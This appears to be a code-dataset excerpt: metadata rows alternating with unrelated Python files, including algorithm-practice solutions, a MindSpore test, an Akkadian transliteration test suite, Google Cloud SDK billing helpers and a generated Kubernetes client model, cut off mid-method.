Python
| false
| false
| 163
|
py
|
# input
A, B, C, D = map(int, input().split())
# processing
# 0 -- A -- B ---...
# 0 ---- C ---- D ---...
res = max(min(B, D) - max(A, C), 0)
# output
print(res)
|
[
"sakaimasayuki@sakaimasayukinoMacBook-puro.local"
] |
sakaimasayuki@sakaimasayukinoMacBook-puro.local
|
f06cc6f2c9d30f0a1597c6703f19934298fd36c3
|
9e31cabea36b122be02fa778264a5c9a313a7a3c
|
/chapter_17/p17_4.py
|
01f1d2cde0b036ebaedf4b1335f016b631309473
|
[] |
no_license
|
anywhere1234/CTCI_python
|
b1c27997fe20d17f48b423e647fed600811ab015
|
6c7e71f4829708da397867dd9b2cec61a654d3f9
|
refs/heads/master
| 2023-02-09T14:02:29.710006
| 2021-01-06T00:04:58
| 2021-01-06T00:04:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,564
|
py
|
from typing import List
def get_bit(a: int, bit_nr: int) -> int:
shifted_a = a >> (bit_nr)
return shifted_a & 0b1
def find_mssing(arr: List[int], n: int) -> int:
return find_missing_helper(arr, list(range(len(arr))), 0, n)
def find_missing_helper(arr: List[int],
list_indexes: List[int],
bit_offset: int,
n: int) -> int:
if n == 0:
return 0
odds = []
evens = []
for i in list_indexes:
bit_now = get_bit(arr[i], bit_offset)
if bit_now:
odds.append(i)
else:
evens.append(i)
expected_odds = 0
expected_evens = 0
for i in range(n+1):
if i & 0b1:
expected_odds += 1
else:
expected_evens += 1
if len(evens) < expected_evens:
bit_now = 0
rest = find_missing_helper(arr, evens, bit_offset+1, n >> 1)
else:
bit_now = 1
rest = find_missing_helper(arr, odds, bit_offset+1, n >> 1)
# print(f"Bit now is {bit_now}, rest {rest},"
# f" evens: {evens} (expected {expected_evens}),"
# f" odds: {odds} (expected {expected_odds})")
return (rest << 1) | bit_now
# 11 # 1
# --- ->
# 10 # 0
# 01
# 00
if __name__ == "__main__":
exs = [
([0, 1, 2], 3),
([1, 2, 3, 4, 5, 6, 7, 8], 8),
([0, 1, 2, 3, 5], 5),
([1, 2, 3, 4, 5, 6, 7, 8, 0], 9)
]
for arr, n in exs:
print(f"In arr {arr}, with limit {n}, missing is {find_mssing(arr,n)}")
|
[
"bogdan.stoicescu95@gmail.com"
] |
bogdan.stoicescu95@gmail.com
|
db0a75c33b2d39ccd10641bc74430fa734206139
|
d305e9667f18127e4a1d4d65e5370cf60df30102
|
/tests/ut/cpp/python_input/gtest_input/pre_activate/fused_batch_norm_fusion_test.py
|
472e7a5d4be4cf0dc07a5047f721afdf0469bf6f
|
[
"Apache-2.0",
"MIT",
"Libpng",
"LicenseRef-scancode-proprietary-license",
"LGPL-2.1-only",
"AGPL-3.0-only",
"MPL-2.0-no-copyleft-exception",
"IJG",
"Zlib",
"MPL-1.1",
"BSD-3-Clause",
"BSD-3-Clause-Open-MPI",
"MPL-1.0",
"GPL-2.0-only",
"MPL-2.0",
"BSL-1.0",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause"
] |
permissive
|
imyzx2017/mindspore_pcl
|
d8e5bd1f80458538d07ef0a8fc447b552bd87420
|
f548c9dae106879d1a83377dd06b10d96427fd2d
|
refs/heads/master
| 2023-01-13T22:28:42.064535
| 2020-11-18T11:15:41
| 2020-11-18T11:15:41
| 313,906,414
| 6
| 1
|
Apache-2.0
| 2020-11-18T11:25:08
| 2020-11-18T10:57:26
| null |
UTF-8
|
Python
| false
| false
| 4,398
|
py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import mindspore.common.dtype as mstype
from mindspore.common.tensor import Tensor
from mindspore.ops import Primitive
from mindspore.ops import operations as P
from mindspore.ops import functional as F
AssignSub = P.AssignSub()
Mul = P.Mul()
Sub = P.Sub()
make_tuple = Primitive('make_tuple')
tuple_getitem = Primitive('tuple_getitem')
BatchNorm = P.BatchNorm()
Cast = P.Cast()
BNTrainingReduce = Primitive('BNTrainingReduce')
BNTrainingUpdate = Primitive('BNTrainingUpdate')
constant0 = Tensor(0.1, mstype.float32)
constant1 = Tensor(0.1, mstype.float32)
class FnDict:
def __init__(self):
self.fnDict = {}
def __call__(self, fn):
self.fnDict[fn.__name__] = fn
def __getitem__(self, name):
return self.fnDict[name]
def test_fused_batch_norm_fusion(tag):
fns = FnDict()
@fns
def before(input0, input1, input2, input3, input4, var0, var1):
batch_norm = BatchNorm(input0, input1, input2, input3, input4)
sub0 = Sub(var0, tuple_getitem(batch_norm, 1))
sub1 = Sub(var1, tuple_getitem(batch_norm, 2))
mul0 = Mul(sub0, constant0)
mul1 = Mul(sub1, constant1)
assign_sub0 = AssignSub(var0, mul0)
assign_sub1 = AssignSub(var1, mul1)
depend0 = F.depend(tuple_getitem(batch_norm, 0), assign_sub0)
depend1 = F.depend(depend0, assign_sub1)
outputs = make_tuple(depend1, tuple_getitem(batch_norm, 3), tuple_getitem(batch_norm, 4))
output = tuple_getitem(outputs, 0)
return output
@fns
def before_mix_precision0(input0, input1, input2, input3, input4, var0, var1):
batch_norm = BatchNorm(input0, input1, input2, input3, input4)
sub0 = Sub(Cast(var0, mstype.float32), tuple_getitem(batch_norm, 1))
sub1 = Sub(Cast(var1, mstype.float32), tuple_getitem(batch_norm, 2))
mul0 = Mul(sub0, constant0)
mul1 = Mul(sub1, constant1)
assign_sub0 = AssignSub(var0, Cast(mul0, mstype.float32))
assign_sub1 = AssignSub(var1, Cast(mul1, mstype.float32))
depend0 = F.depend(tuple_getitem(batch_norm, 0), assign_sub0)
depend1 = F.depend(depend0, assign_sub1)
outputs = make_tuple(depend1, tuple_getitem(batch_norm, 3), tuple_getitem(batch_norm, 4))
output = tuple_getitem(outputs, 0)
return output
@fns
def before_mix_precision1(input0, input1, input2, input3, input4, var0, var1):
batch_norm = BatchNorm(input0, input1, input2, input3, input4)
sub0 = Sub(Cast(var0, mstype.float32), tuple_getitem(batch_norm, 1))
sub1 = Sub(Cast(var1, mstype.float32), tuple_getitem(batch_norm, 2))
mul0 = Mul(Cast(sub0, mstype.float32), constant0)
mul1 = Mul(Cast(sub1, mstype.float32), constant1)
assign_sub0 = AssignSub(var0, mul0)
assign_sub1 = AssignSub(var1, mul1)
depend0 = F.depend(tuple_getitem(batch_norm, 0), assign_sub0)
depend1 = F.depend(depend0, assign_sub1)
outputs = make_tuple(depend1, tuple_getitem(batch_norm, 3), tuple_getitem(batch_norm, 4))
output = tuple_getitem(outputs, 0)
return output
@fns
def after(input0, input1, input2, input3, input4, var0, var1):
bn_training_reduce = BNTrainingReduce(input0)
bn_training_update = BNTrainingUpdate(input0, tuple_getitem(bn_training_reduce, 0),
tuple_getitem(bn_training_reduce, 1), input1, input2, var0, var1)
outputs = make_tuple(tuple_getitem(bn_training_update, 0), tuple_getitem(bn_training_update, 3),
tuple_getitem(bn_training_update, 4))
output = tuple_getitem(outputs, 0)
return make_tuple(output)
return fns[tag]
|
[
"513344092@qq.com"
] |
513344092@qq.com
|
156a74067eb5fcfb827403fb746855c07b61a2b1
|
6cd690fb01e100f440289ea8fe7342bb58d37e78
|
/src/elemental/ability/abilities/rampage.py
|
5048dec0f9e2721eec09a8315b46108a732a6b0c
|
[] |
no_license
|
Hammerlord/Monbot
|
6db8308ae492d7cfbb6f1bdff909105129924269
|
fde8177d9170dddd958a89068a560008259d6e24
|
refs/heads/master
| 2020-03-07T16:43:20.019123
| 2019-08-29T03:08:33
| 2019-08-29T03:08:33
| 127,591,188
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 693
|
py
|
from src.core.elements import Elements, Category
from src.elemental.ability.ability import Ability
class Rampage(Ability):
def __init__(self):
super().__init__()
self.name = 'Rampage'
self._description = ("Strike the opponent in a fury over the next 3 turns. "
"During this time, no other action can be taken.")
self.element = Elements.EARTH
self.mana_cost = 8
self.attack_power = 12
self.category = Category.PHYSICAL
@property
def base_channel_time(self) -> int:
return 3
def get_recap(self, elemental_name: str) -> str:
return f"{elemental_name} has entered a rampage!"
|
[
"nepharus@gmail.com"
] |
nepharus@gmail.com
|
169a1fd5a957f93eb770569acd3dbba2aa737d62
|
2411e39691f02bec1cd03958a0bd5c2c850db457
|
/py/applets/teapot.py
|
43d30204e469053006ae47273dbd721402594e44
|
[] |
no_license
|
wielandgmeiner/javacard_playground
|
d9c2067901e3005b69cd69b17774f00f19a04c6e
|
758fb14418f6aa0079da794efa67384db512fafd
|
refs/heads/master
| 2022-09-21T15:32:28.194817
| 2020-05-31T19:16:54
| 2020-05-31T19:16:54
| 259,915,974
| 0
| 0
| null | 2020-04-29T12:13:25
| 2020-04-29T12:13:24
| null |
UTF-8
|
Python
| false
| false
| 336
|
py
|
from .core import AppletBase
class Teapot(AppletBase):
def __init__(self, connection=None):
super().__init__("B00B5111CA01", connection)
def get_data(self):
return self.request("B0A10000")
def put_data(self, d):
data = bytes([len(d)])+d.encode()
return self.request("B0A20000"+data.hex())
|
[
"snigirev.stepan@gmail.com"
] |
snigirev.stepan@gmail.com
|
c4eabefbb636b88c245f4eeddf235b3bf569d694
|
e6e57bf7d4eda37f1188ab72ff249675f40029ee
|
/algorithms_and_data_structures/arrays/Valid Sudoku.py
|
cd5a560608706499dcf3eb78cabfb8e53630207a
|
[] |
no_license
|
juanpedrovel/bomboclap
|
4e186331ef1c26c8522e44c21d6a33358471786b
|
99db02266c31dd14357ef6a575d35fcf55718617
|
refs/heads/master
| 2020-04-19T21:16:38.141830
| 2019-01-31T00:31:24
| 2019-01-31T00:31:24
| 168,436,881
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,638
|
py
|
class Solution:
def isValidSudoku(self, board):
"""
:type board: List[List[str]]
:rtype: bool
"""
def bx_numb(i, j):
box_number = 0
if j > 5:
box_number += 2
elif j > 2:
box_number += 1
if i > 5:
box_number += 6
elif i > 2:
box_number += 3
return box_number
column = []
row = []
box = []
for i in range(9):
column.append({})
row.append({})
box.append({})
for i in range(9):
for j in range(9):
cell = board[i][j]
if cell == '.':
continue
else:
box_number = bx_numb(i, j)
if cell not in column[i] and cell not in row[j] and cell not in box[box_number]:
column[i][cell] = 1
row[j][cell] = 1
box[box_number][cell] = 1
else:
return False
return True
s = [
["5","3",".",".","7",".",".",".","."],
["6",".",".","1","9","5",".",".","."],
[".","9","8",".",".",".",".","6","."],
["8",".",".",".","6",".",".",".","3"],
["4",".",".","8",".","3",".",".","1"],
["7",".",".",".","2",".",".",".","6"],
[".","6",".",".",".",".","2","8","."],
[".",".",".","4","1","9",".",".","5"],
[".",".",".",".","8",".",".","7","9"]
]
dict = [2,2]
d = Solution()
print(d.isValidSudoku(s))
|
[
"juanpedrovel@gmail.com"
] |
juanpedrovel@gmail.com
|
b22195cecdaf5c8cf512f825dadae2c5286b19a2
|
2c97e11e13bfbabfdae8979385ba0957c7b11270
|
/ebl/tests/transliteration/test_normalized_akkadian.py
|
647d2b00a0572b7f4c97be63209b86160d835bb1
|
[
"MIT"
] |
permissive
|
ElectronicBabylonianLiterature/ebl-api
|
72a2a95291e502ec89a20ebe5c14447e63ac6d92
|
4910f6fbb57fa213fef55cbe9bc16215aebbaa27
|
refs/heads/master
| 2023-08-16T12:42:03.303042
| 2023-08-16T10:59:44
| 2023-08-16T10:59:44
| 135,266,736
| 11
| 3
|
MIT
| 2023-09-12T09:56:14
| 2018-05-29T08:39:58
|
Python
|
UTF-8
|
Python
| false
| false
| 5,532
|
py
|
import pytest
from ebl.dictionary.domain.word import WordId
from ebl.lemmatization.domain.lemmatization import LemmatizationToken
from ebl.tests.asserts import assert_token_serialization
from ebl.transliteration.application.token_schemas import OneOfTokenSchema
from ebl.transliteration.domain.atf import Flag
from ebl.transliteration.domain.enclosure_tokens import (
BrokenAway,
Emendation,
PerhapsBrokenAway,
)
from ebl.transliteration.domain.normalized_akkadian import (
AkkadianWord,
Caesura,
MetricalFootSeparator,
)
from ebl.transliteration.domain.tokens import Joiner, UnknownNumberOfSigns, ValueToken
@pytest.mark.parametrize(
"word,expected,lemmatizable",
[
(AkkadianWord.of((ValueToken.of("ibnû"),)), "ibnû", True),
(
AkkadianWord.of(
(ValueToken.of("ibnû"),), (Flag.UNCERTAIN, Flag.DAMAGE, Flag.CORRECTION)
),
"ibnû?#!",
True,
),
(AkkadianWord.of((BrokenAway.open(), ValueToken.of("ibnû"))), "[ibnû", True),
(
AkkadianWord.of(
(
BrokenAway.open(),
PerhapsBrokenAway.open(),
ValueToken.of("ib"),
PerhapsBrokenAway.close(),
ValueToken.of("nû"),
BrokenAway.close(),
)
),
"[(ib)nû]",
True,
),
(
AkkadianWord.of(
(
BrokenAway.open(),
PerhapsBrokenAway.open(),
Emendation.open(),
ValueToken.of("ib"),
PerhapsBrokenAway.close(),
ValueToken.of("nû"),
Emendation.close(),
BrokenAway.close(),
)
),
"[(<ib)nû>]",
True,
),
(
AkkadianWord.of(
(ValueToken.of("ibnû"), PerhapsBrokenAway.close(), BrokenAway.close()),
(Flag.UNCERTAIN,),
),
"ibnû?)]",
True,
),
(
AkkadianWord.of(
(ValueToken.of("ib"), UnknownNumberOfSigns.of(), ValueToken.of("nû"))
),
"ib...nû",
False,
),
(
AkkadianWord.of(
(ValueToken.of("ib"), Joiner.hyphen(), ValueToken.of("nû"))
),
"ib-nû",
True,
),
],
)
def test_akkadian_word(word: AkkadianWord, expected: str, lemmatizable: bool) -> None:
assert word.value == expected
assert word.clean_value == expected.translate(str.maketrans("", "", "[]()<>#?!"))
assert word.lemmatizable is lemmatizable
assert word.alignable is lemmatizable
serialized = {
"type": "AkkadianWord",
"parts": OneOfTokenSchema().dump(word.parts, many=True),
"modifiers": [modifier.value for modifier in word.modifiers],
"uniqueLemma": [],
"alignment": None,
"variant": None,
"lemmatizable": lemmatizable,
"alignable": lemmatizable,
"normalized": True,
"language": "AKKADIAN",
"hasVariantAlignment": word.has_variant_alignment,
"hasOmittedAlignment": word.has_omitted_alignment,
}
assert_token_serialization(word, serialized)
def test_akkadian_word_invalid_modifier() -> None:
with pytest.raises(ValueError): # pyre-ignore[16]
AkkadianWord.of((ValueToken.of("ibnû"),), (Flag.COLLATION,))
def test_set_unique_lemma() -> None:
word = AkkadianWord.of((ValueToken.of("bu"),))
lemma = LemmatizationToken("bu", (WordId("nu I"),))
expected = AkkadianWord.of((ValueToken.of("bu"),), unique_lemma=(WordId("nu I"),))
assert word.set_unique_lemma(lemma) == expected
def test_set_unique_lemma_empty() -> None:
word = AkkadianWord.of((ValueToken.of("bu"),), unique_lemma=(WordId("nu I"),))
lemma = LemmatizationToken("bu", tuple())
expected = AkkadianWord.of((ValueToken.of("bu"),))
assert word.set_unique_lemma(lemma) == expected
def test_set_alignment() -> None:
word = AkkadianWord.of((ValueToken.of("bu"),))
expected = AkkadianWord.of((ValueToken.of("bu"),), alignment=1)
assert word.set_alignment(1, None) == expected
def test_set_alignment_empty() -> None:
word = AkkadianWord.of((ValueToken.of("bu"),), alignment=1)
expected = AkkadianWord.of((ValueToken.of("bu"),))
assert word.set_alignment(None, None) == expected
@pytest.mark.parametrize(
"caesura,is_uncertain,value",
[(Caesura.certain(), False, "||"), (Caesura.uncertain(), True, "(||)")],
)
def test_caesura(caesura: Caesura, is_uncertain: bool, value: str) -> None:
assert caesura.value == value
assert caesura.is_uncertain == is_uncertain
serialized = {"type": "Caesura", "isUncertain": is_uncertain}
assert_token_serialization(caesura, serialized)
@pytest.mark.parametrize(
"separator,is_uncertain,value",
[
(MetricalFootSeparator.certain(), False, "|"),
(MetricalFootSeparator.uncertain(), True, "(|)"),
],
)
def test_metrical_foot_separator(
separator: MetricalFootSeparator, is_uncertain: bool, value: str
) -> None:
assert separator.value == value
assert separator.is_uncertain == is_uncertain
serialized = {"type": "MetricalFootSeparator", "isUncertain": is_uncertain}
assert_token_serialization(separator, serialized)
|
[
"noreply@github.com"
] |
ElectronicBabylonianLiterature.noreply@github.com
|
ab8f7035259fa98d9b0d12e248edfddb9335aab6
|
407ae3372e98442698332394a3da95f8f4c488a6
|
/results/mcmc_100chains/chains_fidsig_fidcov_nonuni_landyszalay/prep_corrmatrixDATAPARAMS/combine_dddr_78.py
|
1c845494911885a0a55f330c93ae926b4511b1ec
|
[] |
no_license
|
aszewciw/MW_Structure
|
0ce437627f4c43f776eae658aad8b98a280d6b06
|
ba25761aa9444ca5c04e3a4ad617b29d586ba4c8
|
refs/heads/master
| 2021-01-12T11:59:15.717154
| 2017-12-07T00:21:54
| 2017-12-07T00:21:54
| 68,852,501
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,417
|
py
|
'''
Produce files containing the indices of binned pairs. Here we do this for a
uniform sample.
'''
import mw_utilities_python as mwu
import sys, pickle, os
import numpy as np
def main():
Nmocks = 1000
star_factor = 10
dd_dir = '../../prep_fid_errors_DATAPARAMS/data/'
dr_dir = './data/'
out_dir = './data/'
# get directories of scripts, executables, and star files
cleaned_dir = mwu.get_path.get_cleandata_path()
scripts_dir = mwu.get_path.get_scripts_path()
if not os.path.isdir(out_dir):
sys.stderr.write('{} does not exist. Exiting...\n'.format(out_dir))
sys.exit(1)
if not os.path.isdir(dr_dir):
sys.stderr.write('{} does not exist. Exiting...\n'.format(dr_dir))
sys.exit(1)
if not os.path.isdir(dd_dir):
sys.stderr.write('{} does not exist. Exiting...\n'.format(dd_dir))
sys.exit(1)
# Load todo list
input_filename = cleaned_dir + 'todo_list.dat'
sys.stderr.write('Loading from file {} ...\n'.format(input_filename))
input_file = open(input_filename, 'rb')
todo_list = pickle.load(input_file)
input_file.close()
# Write command file
for i in range(Nmocks):
if i <700: continue
if i>799: continue
sys.stderr.write('On sample {}/{}\n'.format(i,Nmocks))
DD_dir = dd_dir + 'sample_' + str(i) + '/'
DR_dir = dr_dir + 'sample_' + str(i) + '/'
OUT_dir = out_dir + 'sample_' + str(i) + '/'
if not os.path.isdir(DD_dir):
sys.stderr.write('{} does not exist. Exiting...\n'.format(DD_dir))
sys.exit(1)
if not os.path.isdir(DR_dir):
sys.stderr.write('{} does not exist. Exiting...\n'.format(DR_dir))
sys.exit(1)
if not os.path.isdir(OUT_dir):
sys.stderr.write('{} does not exist. Exiting...\n'.format(OUT_dir))
sys.exit(1)
for p in todo_list:
N_rand = int(p.N_star * star_factor)
dr_file = DR_dir + 'dr_' + p.ID + '.dat'
dd_file = DD_dir + 'dd_' + p.ID + '.dat'
out_file = OUT_dir + 'DDm2DR_' + p.ID + '.dat'
dr = np.genfromtxt(dr_file, unpack=True, usecols=[4])
dd = np.genfromtxt(dd_file, unpack=True, usecols=[4])
ddm2dr = dd - 2.0*dr
np.savetxt(out_file, ddm2dr, fmt='%.6e')
if __name__ == '__main__':
main()
|
[
"aszewci@gmail.com"
] |
aszewci@gmail.com
|
03b93222dc4c00950cafabceaa0b78a0966de0bf
|
5c8139f1e57e06c7eaf603bd8fe74d9f22620513
|
/PartB/py图像的渲染.py
|
d38a444d1e9b9dacfe956cabdc89c130cf467422
|
[] |
no_license
|
madeibao/PythonAlgorithm
|
c8a11d298617d1abb12a72461665583c6a44f9d2
|
b4c8a75e724a674812b8a38c0202485776445d89
|
refs/heads/master
| 2023-04-03T07:18:49.842063
| 2021-04-11T12:02:40
| 2021-04-11T12:02:40
| 325,269,130
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,144
|
py
|
# 图片的渲染。
有一幅以二维整数数组表示的图画,每一个整数表示该图画的像素值大小,数值在 0 到 65535 之间。
给你一个坐标 (sr, sc) 表示图像渲染开始的像素值(行 ,列)和一个新的颜色值 newColor,让你重新上色这幅图像。
为了完成上色工作,从初始坐标开始,记录初始坐标的上下左右四个方向上像素值与初始坐标相同的相连像素点,接着再记录这四个方向上符合条件的像素点与他们对应四个方向上像素值与初始坐标相同的相连像素点,……,重复该过程。将所有有记录的像素点的颜色值改为新的颜色值。
最后返回经过上色渲染后的图像。
示例 1:
输入:
image = [[1,1,1],[1,1,0],[1,0,1]]
sr = 1, sc = 1, newColor = 2
输出: [[2,2,2],[2,2,0],[2,0,1]]
解析:
在图像的正中间,(坐标(sr,sc)=(1,1)),
在路径上所有符合条件的像素点的颜色都被更改成2。
注意,右下角的像素没有更改为2,
因为它不是在上下左右四个方向上与初始点相连的像素点。
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/flood-fill
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
# ---------------------------------------------------------------------------------------- ----------------
from typing import List
class Solution:
def floodFill(self, image: List[List[int]], sr: int, sc: int, newColor: int) -> List[List[int]]:
color = image[sr][sc]
if color == newColor:
# 如果是没有染色的条件下,则直接的进行返回。
return image
def dfs(i, j):
if 0 > i or i >= len(image) or 0 > j or j >= len(image[0]) or image[i][j] != color:
return
image[i][j] = newColor
dfs(i+1, j)
dfs(i-1, j)
dfs(i, j+1)
dfs(i, j-1)
dfs(sr, sc)
return image
if __name__ == "__main__":
s = Solution()
list2= [[1,1,1],
[1,1,0],
[1,0,1]]
print(s.floodFill(list2))
|
[
"2901429479@qq.com"
] |
2901429479@qq.com
|
1c0672167fdd543464f6bbd6c8ac7098353c0bea
|
d1ddb9e9e75d42986eba239550364cff3d8f5203
|
/google-cloud-sdk/lib/googlecloudsdk/command_lib/billing/utils.py
|
718213de8b0203d284f7c2d410fd64d0ab94b416
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
bopopescu/searchparty
|
8ecd702af0d610a7ad3a8df9c4d448f76f46c450
|
afdc2805cb1b77bd5ac9fdd1a76217f4841f0ea6
|
refs/heads/master
| 2022-11-19T14:44:55.421926
| 2017-07-28T14:55:43
| 2017-07-28T14:55:43
| 282,495,798
| 0
| 0
|
Apache-2.0
| 2020-07-25T17:48:53
| 2020-07-25T17:48:52
| null |
UTF-8
|
Python
| false
| false
| 1,117
|
py
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for billing commands."""
from googlecloudsdk.core import resources
PROJECTS_COLLECTION = 'cloudbilling.projects'
ACCOUNTS_COLLECTION = 'cloudbilling.billingAccounts'
def GetRegistry():
registry = resources.REGISTRY.Clone()
registry.RegisterApiByName('cloudbilling', 'v1')
return registry
def ParseProject(project_id):
return GetRegistry().Parse(project_id, collection=PROJECTS_COLLECTION)
def ParseAccount(account_id):
return GetRegistry().Parse(account_id, collection=ACCOUNTS_COLLECTION)
|
[
"vinvivo@users.noreply.github.com"
] |
vinvivo@users.noreply.github.com
|
83e04af598a29f1f5bb89e074965a329449c3d81
|
bc1928bb2742ad96bceb725e4bca65abd9bdbcaf
|
/NinjaGold/venv/bin/pip2
|
c23e2d6f7d0480927da64b475980713b2e1817b2
|
[] |
no_license
|
waterFlowin/Python-Projects
|
767ad675be902739cea0119e554ed3501eeba793
|
1503bc0c236295c53c38f8fbc5189f4a9b7ba1f1
|
refs/heads/master
| 2021-01-20T00:21:08.155024
| 2017-04-23T03:48:20
| 2017-04-23T03:48:20
| 89,115,581
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 262
|
#!/Users/waterFlow/Documents/PythonAssignments/NinjaGold/venv/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from pip import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"johndoe@example.com"
] |
johndoe@example.com
|
|
5c9c45a5bbfac836a6957791a648c100d07822db
|
dfaf6f7ac83185c361c81e2e1efc09081bd9c891
|
/k8sdeployment/k8sstat/python/kubernetes/client/models/v1beta1_local_subject_access_review.py
|
0010ecb23188972522b0f3c64241b7f6a494e26f
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
JeffYFHuang/gpuaccounting
|
d754efac2dffe108b591ea8722c831d979b68cda
|
2c63a63c571240561725847daf1a7f23f67e2088
|
refs/heads/master
| 2022-08-09T03:10:28.185083
| 2022-07-20T00:50:06
| 2022-07-20T00:50:06
| 245,053,008
| 0
| 0
|
MIT
| 2021-03-25T23:44:50
| 2020-03-05T02:44:15
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 7,366
|
py
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: v1.15.6
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class V1beta1LocalSubjectAccessReview(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'api_version': 'str',
'kind': 'str',
'metadata': 'V1ObjectMeta',
'spec': 'V1beta1SubjectAccessReviewSpec',
'status': 'V1beta1SubjectAccessReviewStatus'
}
attribute_map = {
'api_version': 'apiVersion',
'kind': 'kind',
'metadata': 'metadata',
'spec': 'spec',
'status': 'status'
}
def __init__(self, api_version=None, kind=None, metadata=None, spec=None, status=None): # noqa: E501
"""V1beta1LocalSubjectAccessReview - a model defined in OpenAPI""" # noqa: E501
self._api_version = None
self._kind = None
self._metadata = None
self._spec = None
self._status = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
if kind is not None:
self.kind = kind
if metadata is not None:
self.metadata = metadata
self.spec = spec
if status is not None:
self.status = status
@property
def api_version(self):
"""Gets the api_version of this V1beta1LocalSubjectAccessReview. # noqa: E501
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources # noqa: E501
:return: The api_version of this V1beta1LocalSubjectAccessReview. # noqa: E501
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""Sets the api_version of this V1beta1LocalSubjectAccessReview.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources # noqa: E501
:param api_version: The api_version of this V1beta1LocalSubjectAccessReview. # noqa: E501
:type: str
"""
self._api_version = api_version
@property
def kind(self):
"""Gets the kind of this V1beta1LocalSubjectAccessReview. # noqa: E501
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds # noqa: E501
:return: The kind of this V1beta1LocalSubjectAccessReview. # noqa: E501
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""Sets the kind of this V1beta1LocalSubjectAccessReview.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds # noqa: E501
:param kind: The kind of this V1beta1LocalSubjectAccessReview. # noqa: E501
:type: str
"""
self._kind = kind
@property
def metadata(self):
"""Gets the metadata of this V1beta1LocalSubjectAccessReview. # noqa: E501
:return: The metadata of this V1beta1LocalSubjectAccessReview. # noqa: E501
:rtype: V1ObjectMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""Sets the metadata of this V1beta1LocalSubjectAccessReview.
:param metadata: The metadata of this V1beta1LocalSubjectAccessReview. # noqa: E501
:type: V1ObjectMeta
"""
self._metadata = metadata
@property
def spec(self):
"""Gets the spec of this V1beta1LocalSubjectAccessReview. # noqa: E501
:return: The spec of this V1beta1LocalSubjectAccessReview. # noqa: E501
:rtype: V1beta1SubjectAccessReviewSpec
"""
return self._spec
@spec.setter
def spec(self, spec):
"""Sets the spec of this V1beta1LocalSubjectAccessReview.
:param spec: The spec of this V1beta1LocalSubjectAccessReview. # noqa: E501
:type: V1beta1SubjectAccessReviewSpec
"""
if spec is None:
raise ValueError("Invalid value for `spec`, must not be `None`") # noqa: E501
self._spec = spec
@property
def status(self):
"""Gets the status of this V1beta1LocalSubjectAccessReview. # noqa: E501
:return: The status of this V1beta1LocalSubjectAccessReview. # noqa: E501
:rtype: V1beta1SubjectAccessReviewStatus
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this V1beta1LocalSubjectAccessReview.
:param status: The status of this V1beta1LocalSubjectAccessReview. # noqa: E501
:type: V1beta1SubjectAccessReviewStatus
"""
self._status = status
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
